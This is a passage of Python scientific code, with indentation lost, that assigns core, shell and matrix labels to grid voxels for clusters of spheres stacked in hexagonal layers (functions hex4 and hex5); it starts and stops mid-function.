if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex4 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
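# Three stacked hexagonal layers of 7 sphere centres each (21 in total), all classified with
# the same core/shell/matrix test as in hex1.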
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy1= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz1= float((float(radiusc/dl)-float(k)+1))
xx2= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy2= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz2= float((float(radiusc/dl)-float(k)+1))
xx3= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy3= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz3= float((float(radiusc/dl)-float(k)+1))
xx4= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy4= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz4= float((float(radiusc/dl)-float(k)+1))
xx5=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy5= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz5= float((float(radiusc/dl)-float(k)+1))
xx6= float((1.0*float(radiusc/dl)-float(i)+1))
yy6= float((3.0*float(radiusc/dl)-float(j)+1))
zz6= float((float(radiusc/dl)-float(k)+1))
xx7= float((5.0*float(radiusc/dl)-float(i)+1))
yy7= float((3.0*float(radiusc/dl)-float(j)+1))
zz7= float((1.0*float(radiusc/dl)-float(k)+1))
# print(xx1,xx2,xx3,xx4,xx5,xx6,xx7)
# second layer
xx8= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy8= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz8= float((3.0*float(radiusc/dl)-float(k)+1))
xx9= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy9= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz9= float((3.0*float(radiusc/dl)-float(k)+1))
xx10=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy10= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz10= float((3.0*float(radiusc/dl)-float(k)+1))
xx11= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy11= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz11= float((3.0*float(radiusc/dl)-float(k)+1))
xx12= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy12= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz12= float((3.0*float(radiusc/dl)-float(k)+1))
xx13= float((1.0*float(radiusc/dl)-float(i)+1))
yy13= float((3.0*float(radiusc/dl)-float(j)+1))
zz13= float((3.0*float(radiusc/dl)-float(k)+1))
xx14=float((5.0*float(radiusc/dl)-float(i)+1))
yy14= float((3.0*float(radiusc/dl)-float(j)+1))
zz14= float((3.0*float(radiusc/dl)-float(k)+1))
# third layer
xx15=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy15= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz15= float((5.0*float(radiusc/dl)-float(k)+1))
xx16= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy16= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz16= float((5.0*float(radiusc/dl)-float(k)+1))
xx17= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy17= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz17=float((5.0*float(radiusc/dl)-float(k)+1))
xx18= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy18= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz18= float((5.0*float(radiusc/dl)-float(k)+1))
xx19= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy19= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz19=float((5.0*float(radiusc/dl)-float(k)+1))
xx20= float((1.0*float(radiusc/dl)-float(i)+1))
yy20= float((3.0*float(radiusc/dl)-float(j)+1))
zz20= float((5.0*float(radiusc/dl)-float(k)+1))
xx21= float((5.0*float(radiusc/dl)-float(i)+1))
yy21= float((3.0*float(radiusc/dl)-float(j)+1))
zz21= float((5.0*float(radiusc/dl)-float(k)+1))
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex5 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
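# Hard-coded cluster of 21 sphere centres (two hexagonal layers of 7, then 4, 2 and 1 in the
# upper layers); classification is the same core/shell/matrix test as in hex1.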
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy1= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz1=float((float(radiusc/dl)-k+1))
xx2=((3-1.0)*radiusc/dl-i+1)
yy2= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((3+1.0)*radiusc/dl-i+1)
yy3= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((3-1.0)*radiusc/dl-i+1)
yy4= ((3+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((3+1.0)*radiusc/dl-i+1)
yy5= ((3+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(1*radiusc/dl-i+1)
yy6= (3*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(5*radiusc/dl-i+1)
yy7= (3*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
# second layer
xx8=((3)*radiusc/dl-i+1)
yy8= ((3)*radiusc/dl-j+1)
zz8=(3*radiusc/dl-k+1)
xx9=((3-1.0)*radiusc/dl-i+1)
yy9= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz9=(3*radiusc/dl-k+1)
xx10=((3+1.0)*radiusc/dl-i+1)
yy10= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz10=(3*radiusc/dl-k+1)
xx11=float(((3-1.0)*radiusc/dl-i+1))
yy11= float(((3+sqrt(3.0))*radiusc/dl-j+1))
zz11=float((3*radiusc/dl-k+1))
xx12=((3+1.0)*radiusc/dl-i+1)
yy12= ((3+sqrt(3.0))*radiusc/dl-j+1)
zz12=(3*radiusc/dl-k+1)
xx13=(1*radiusc/dl-i+1)
yy13= (3*radiusc/dl-j+1)
zz13=(3*radiusc/dl-k+1)
xx14=(5*radiusc/dl-i+1)
yy14= (3*radiusc/dl-j+1)
zz14=(3*radiusc/dl-k+1)
# third layer
xx15=((3-1)*radiusc/dl-i+1)
yy15= ((3)*radiusc/dl-j+1)
zz15=((3+sqrt(3.0))*radiusc/dl-k+1)
xx16=((3+1)*radiusc/dl-i+1)
yy16= ((3)*radiusc/dl-j+1)
zz16=((3+sqrt(3.0))*radiusc/dl-k+1)
xx17=((3)*radiusc/dl-i+1)
yy17= ((3-1-sqrt(2.0)/2)*radiusc/dl-j+1)
zz17=((3+sqrt(3.0))*radiusc/dl-k+1)
xx18=((3)*radiusc/dl-i+1)
yy18= ((3+1+sqrt(2.0)/2)*radiusc/dl-j+1)
zz18=((3+1*sqrt(3.0))*radiusc/dl-k+1)
# fourth layer
xx19=((3)*radiusc/dl-i+1)
yy19= ((3-sqrt(3.0)/2)*radiusc/dl-j+1)
zz19=((3+2*sqrt(3.0))*radiusc/dl-k+1)
xx20=((3)*radiusc/dl-i+1)
yy20= ((3+sqrt(3.0)/2)*radiusc/dl-j+1)
zz20=((3+2*sqrt(3.0))*radiusc/dl-k+1)
# fifth layer
xx21=((3)*radiusc/dl-i+1)
yy21= ((3)*radiusc/dl-j+1)
zz21=((4+3*sqrt(3.0))*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
